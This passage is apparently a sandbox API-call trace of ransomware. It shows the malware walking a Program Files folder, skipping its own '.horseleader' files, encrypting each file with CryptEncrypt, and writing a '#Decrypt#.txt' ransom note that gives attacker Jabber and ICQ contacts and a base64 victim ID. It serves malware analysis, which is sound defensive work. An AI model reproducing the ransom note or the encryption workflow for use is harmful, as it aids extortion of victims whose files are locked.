dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0251.355] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.355] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\.") returned 38 [0251.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.355] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xaa276ca7, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f05f082, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0251.355] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.355] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\..") returned 39 [0251.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.356] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xca00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DVDMaker.exe.mui", cAlternateFileName="")) returned 1 [0251.356] lstrcmpiW (lpString1="DVDMaker.exe.mui", lpString2="Windows") returned -1 [0251.356] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned 53 [0251.356] StrStrIW (lpFirst="DVDMaker.exe.mui", lpSrch=".horseleader") returned 0x0 [0251.356] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0251.356] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="_uninstalling_.png") returned 1 [0251.356] lstrlenW (lpString=".testttjffg") returned 11 [0251.356] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui", lpSrch=".testttjffg") returned 0x0 [0251.356] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.356] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.356] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.356] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OmdProject.dll.mui", cAlternateFileName="")) returned 1 [0251.356] lstrcmpiW (lpString1="OmdProject.dll.mui", lpString2="Windows") returned -1 [0251.357] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned 55 [0251.357] StrStrIW (lpFirst="OmdProject.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.357] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.357] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.357] lstrlenW (lpString=".testttjffg") returned 11 [0251.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.359] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 1 [0251.359] lstrcmpiW (lpString1="WMM2CLIP.dll.mui", lpString2="Windows") returned 1 [0251.359] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned 53 [0251.359] StrStrIW (lpFirst="WMM2CLIP.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.359] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.359] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.359] lstrlenW (lpString=".testttjffg") returned 11 [0251.359] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.359] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.359] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.360] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WMM2CLIP.dll.mui", cAlternateFileName="")) returned 0 [0251.360] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0251.360] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\#Decrypt#.txt") returned 50 [0251.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0251.361] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.361] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0251.362] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.362] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0251.363] CloseHandle (hObject=0x1cc) returned 1 [0251.363] GetProcessHeap () returned 0x780000 [0251.363] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0251.363] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd559b52d, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd559b52d, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xddb8, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Eurosti.TTF", cAlternateFileName="")) returned 1 [0251.363] lstrcmpiW (lpString1="Eurosti.TTF", lpString2="Windows") returned -1 [0251.363] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned 42 [0251.363] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".horseleader") returned 0x0 [0251.363] lstrcmpW (lpString1="Eurosti.TTF", lpString2="#Decrypt#.txt") returned 1 [0251.363] lstrcmpW (lpString1="Eurosti.TTF", lpString2="_uninstalling_.png") returned 1 [0251.363] lstrlenW (lpString=".testttjffg") returned 11 [0251.363] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF", lpSrch=".testttjffg") returned 0x0 [0251.363] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.363] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.363] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.364] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="fieldswitch.ax", cAlternateFileName="")) returned 1 [0251.364] lstrcmpiW (lpString1="fieldswitch.ax", lpString2="Windows") returned -1 [0251.364] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned 45 [0251.364] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".horseleader") returned 0x0 [0251.364] lstrcmpW (lpString1="fieldswitch.ax", lpString2="#Decrypt#.txt") returned 1 [0251.364] lstrcmpW (lpString1="fieldswitch.ax", lpString2="_uninstalling_.png") returned 1 [0251.364] lstrlenW (lpString=".testttjffg") returned 11 [0251.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax", lpSrch=".testttjffg") returned 0x0 [0251.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.365] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="offset.ax", cAlternateFileName="")) returned 1 [0251.365] lstrcmpiW (lpString1="offset.ax", lpString2="Windows") returned -1 [0251.365] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax") returned 40 [0251.365] StrStrIW (lpFirst="offset.ax", lpSrch=".horseleader") returned 0x0 [0251.365] lstrcmpW (lpString1="offset.ax", lpString2="#Decrypt#.txt") returned 1 [0251.365] lstrcmpW (lpString1="offset.ax", lpString2="_uninstalling_.png") returned 1 [0251.365] lstrlenW (lpString=".testttjffg") returned 11 [0251.365] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax", lpSrch=".testttjffg") returned 0x0 [0251.365] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.365] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.366] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe46400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="OmdBase.dll", cAlternateFileName="")) returned 1 [0251.366] lstrcmpiW (lpString1="OmdBase.dll", lpString2="Windows") returned -1 [0251.366] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll") returned 42 [0251.366] StrStrIW (lpFirst="OmdBase.dll", lpSrch=".horseleader") returned 0x0 [0251.366] lstrcmpW (lpString1="OmdBase.dll", lpString2="#Decrypt#.txt") returned 1 [0251.366] lstrcmpW (lpString1="OmdBase.dll", lpString2="_uninstalling_.png") returned 1 [0251.366] lstrlenW (lpString=".testttjffg") returned 11 [0251.366] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll", lpSrch=".testttjffg") returned 0x0 [0251.366] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.366] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.366] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.367] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0efd6c5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0efd6c5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb102e1c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x432600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="OmdProject.dll", cAlternateFileName="")) returned 1 [0251.367] lstrcmpiW (lpString1="OmdProject.dll", lpString2="Windows") returned -1 [0251.368] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll") returned 45 [0251.368] StrStrIW (lpFirst="OmdProject.dll", lpSrch=".horseleader") returned 0x0 [0251.368] lstrcmpW (lpString1="OmdProject.dll", lpString2="#Decrypt#.txt") returned 1 [0251.368] lstrcmpW (lpString1="OmdProject.dll", lpString2="_uninstalling_.png") returned 1 [0251.368] lstrlenW (lpString=".testttjffg") returned 11 [0251.368] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll", lpSrch=".testttjffg") returned 0x0 [0251.368] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.368] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.368] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b6b5be, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0b6b5be, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bb787f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Pipeline.dll", cAlternateFileName="")) returned 1 [0251.368] lstrcmpiW (lpString1="Pipeline.dll", lpString2="Windows") returned -1 [0251.368] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll") returned 43 [0251.368] StrStrIW (lpFirst="Pipeline.dll", lpSrch=".horseleader") returned 0x0 [0251.369] lstrcmpW (lpString1="Pipeline.dll", lpString2="#Decrypt#.txt") returned 1 [0251.369] lstrcmpW (lpString1="Pipeline.dll", lpString2="_uninstalling_.png") returned 1 [0251.369] lstrlenW (lpString=".testttjffg") returned 11 [0251.369] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll", lpSrch=".testttjffg") returned 0x0 [0251.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.369] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b5c53e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc7b5c53e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43aceae0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1cc000, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="PipeTran.dll", cAlternateFileName="")) returned 1 [0251.369] lstrcmpiW (lpString1="PipeTran.dll", lpString2="Windows") returned -1 [0251.369] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll") returned 43 [0251.369] StrStrIW (lpFirst="PipeTran.dll", lpSrch=".horseleader") returned 0x0 [0251.369] lstrcmpW (lpString1="PipeTran.dll", lpString2="#Decrypt#.txt") returned 1 [0251.370] lstrcmpW (lpString1="PipeTran.dll", lpString2="_uninstalling_.png") returned 1 [0251.370] lstrlenW (lpString=".testttjffg") returned 11 [0251.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll", lpSrch=".testttjffg") returned 0x0 [0251.370] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.370] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.370] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.370] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, 